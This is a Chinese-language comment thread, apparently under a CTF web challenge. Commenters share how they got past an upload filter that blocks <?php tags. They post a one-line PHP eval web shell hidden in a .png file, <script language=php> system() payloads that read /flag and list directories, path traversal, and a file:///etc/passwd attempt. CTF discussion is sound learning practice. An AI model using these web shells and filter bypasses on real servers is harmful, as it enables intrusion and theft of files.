看了源码 这里屏蔽了伪协议,文件上传过滤了<?php 和 ?> 这两个 后面那个基本现在都不用了 短标签 `<?=`,`<?` script标签也可以
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功
大佬,中国蚁剑怎么连上的哦,他从服务器端直接过滤了php,直接就把最基本的连接类型阻断了,抓包也不能修改php类型
将<script language=php>system("cat /flag")</script>写成jpg文件上传直接访问就有flag了
什么意思,直接改成/flag就出来了
我这运气 file:///etc/passwd
这题目我使用蚁剑连接不上,就写了<script language="php" >system('ls -al /')</script>查看目录 <script language="php" >system('tac /flag')</script>找到flag
用蚁剑看了眼发现flag文件被放到了根目录
/flag ??????
@思南you flag是直接存放在根目录下的
这是什么原理大佬
一个一个传的<script language=php>system("cat ../../../flag")</script>
...
评论
liln0te 2年前
举报
看了源码 这里屏蔽了伪协议,文件上传过滤了<?php 和 ?> 这两个 后面那个基本现在都不用了 短标签 `<?=`,`<?` script标签也可以
lysr 2年前
举报
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功
lysr 2年前
举报
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功
109张某 1年前
举报
大佬,中国蚁剑怎么连上的哦,他从服务器端直接过滤了php,直接就把最基本的连接类型阻断了,抓包也不能修改php类型
admin138798 2年前
举报
将<script language=php>system("cat /flag")</script>写成jpg文件上传直接访问就有flag了
狐萝卜CarroT 2年前
举报
什么意思,直接改成/flag就出来了
zxmals 2年前
举报
我这运气 file:///etc/passwd
wINFerno 2年前
举报
这题目我使用蚁剑连接不上,就写了<script language="php" >system('ls -al /')</script>查看目录 <script language="php" >system('tac /flag')</script>找到flag
zhou0626 3年前
举报
用蚁剑看了眼发现flag文件被放到了根目录
andrewlong 3年前
举报
/flag ??????
守得云开见月明 2年前
举报
@思南you flag是直接存放在根目录下的
思南you 3年前
举报
这是什么原理大佬
王大发财 3年前
举报
一个一个传的<script language=php>system("cat ../../../flag")</script>